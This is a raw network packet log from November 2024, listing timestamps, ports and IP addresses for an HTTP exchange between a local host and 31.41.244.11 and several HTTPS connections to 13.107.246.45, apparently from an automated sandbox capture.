Nov 4, 2024 17:32:08.974155903 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.974186897 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.000673056 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.000902891 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.000993967 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.001087904 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.001203060 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.001224041 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.001234055 CET	49955	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.001240969 CET	443	49955	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.001615047 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.001677036 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.001725912 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.001748085 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.001763105 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.001770020 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.004735947 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.004766941 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.004779100 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.004807949 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.004843950 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.004874945 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.005033970 CET	49958	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.005045891 CET	49959	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.005047083 CET	443	49958	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.005059004 CET	443	49959	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.023772001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.023792028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.023804903 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.023838043 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.023863077 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.051572084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.051592112 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.051604986 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.051615953 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.051628113 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.051641941 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.051698923 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.051732063 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.052206039 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.052257061 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.053199053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.053253889 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.094357014 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.094521046 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.094578028 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.094590902 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.094620943 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.094659090 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.095197916 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.095210075 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.095221043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.095242977 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.095268965 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.095807076 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.095851898 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.095982075 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.095993042 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.096004009 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.096014023 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.096024990 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.096029043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.096044064 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.096076012 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.143450022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.143467903 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.143481970 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.143517017 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.143546104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.176103115 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176120043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176131964 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176142931 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176155090 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176167011 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176182032 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.176234961 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.176398993 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176445961 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.176572084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.176616907 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.213840961 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.213857889 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.213871002 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.213882923 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.213901043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.213912964 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.213913918 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.213946104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.213989019 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.214088917 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.214145899 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.214272976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.214283943 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.214296103 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.214313030 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.214327097 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.214351892 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.215203047 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.215214968 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.215225935 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.215265989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.215354919 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.215390921 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.215409994 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.265041113 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.265099049 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.265115976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.265173912 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.265201092 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.289261103 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.289290905 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.289304018 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.289324045 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.289330006 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.289331913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.289401054 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.289442062 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.310975075 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.311743975 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.311758995 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.312315941 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.312320948 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.332530022 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332592964 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332611084 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332623959 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332636118 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332648039 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332658052 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.332681894 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332695961 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.332741022 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.332768917 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332783937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.332815886 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.332842112 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335233927 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335273981 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335280895 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335292101 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335319996 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335330963 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335403919 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335416079 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335432053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335450888 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335464954 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335762024 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335823059 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335825920 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335848093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335859060 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.335879087 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.335902929 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.354995966 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.355549097 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.355581999 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.356129885 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.356134892 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.357350111 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.357722044 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.357743979 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.358165979 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.358170986 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.388016939 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.388041019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.388051987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.388073921 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.388102055 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.407985926 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.408025980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.408045053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.408077002 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.408077002 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.408102989 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.408269882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.408314943 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.408325911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.408359051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.408392906 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.447304010 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.447377920 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.447427988 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.447681904 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.447701931 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.447714090 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.447720051 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.451133966 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.451162100 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.451227903 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.451374054 CET	49960	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.451385021 CET	443	49960	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.454243898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454294920 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454309940 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454329967 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.454355001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.454384089 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454399109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454412937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454432964 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.454472065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.454747915 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454761982 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.454790115 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.454814911 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456221104 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456289053 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456301928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456312895 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456341028 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456365108 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456387997 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456399918 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456424952 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456424952 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456453085 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456465960 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456774950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456787109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456815004 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456834078 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.456856012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456866980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.456872940 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.457165003 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.457264900 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.457305908 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.486766100 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.486826897 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.486872911 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.487076998 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.487090111 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.487117052 CET	49956	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.487122059 CET	443	49956	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.490155935 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.490179062 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.490256071 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.490402937 CET	49961	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.490416050 CET	443	49961	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.492306948 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.492362022 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.492403030 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.492527008 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.492537975 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.492548943 CET	49957	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.492552996 CET	443	49957	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.494616032 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.494637012 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.494703054 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.494817972 CET	49962	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:09.494826078 CET	443	49962	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:09.507539034 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.507596016 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.507719040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.507730961 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.507766962 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.507831097 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.529120922 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.529145002 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.529156923 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.529184103 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.529239893 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.529268980 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.529282093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.529311895 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.529336929 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.610781908 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.610821009 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.610831976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.610934019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.610944986 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.610958099 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.610969067 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.611015081 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.611130953 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.611183882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.611196041 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.611229897 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.611241102 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.611289024 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.611299992 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.611320972 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.611347914 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.611377954 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.612082005 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612137079 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612154007 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612190008 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.612215042 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.612235069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612248898 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612262964 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612294912 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.612318993 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.612907887 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612921000 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.612972021 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.629360914 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.629390001 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.629400015 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.629483938 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.648931026 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.648964882 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.648976088 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.649056911 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.649416924 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.649430037 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.649486065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.693350077 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.693531990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.693543911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.693556070 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.693568945 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.693643093 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.694091082 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.730061054 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730076075 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730088949 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730102062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730191946 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.730228901 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730246067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730258942 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730328083 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730339050 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.730385065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.730385065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.731518030 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731568098 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731580019 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731637001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.731637001 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.731785059 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731798887 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731810093 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731821060 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:09.731863976 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:09.731906891 CET	49946	80	192.168.2.5	31.41.244.11
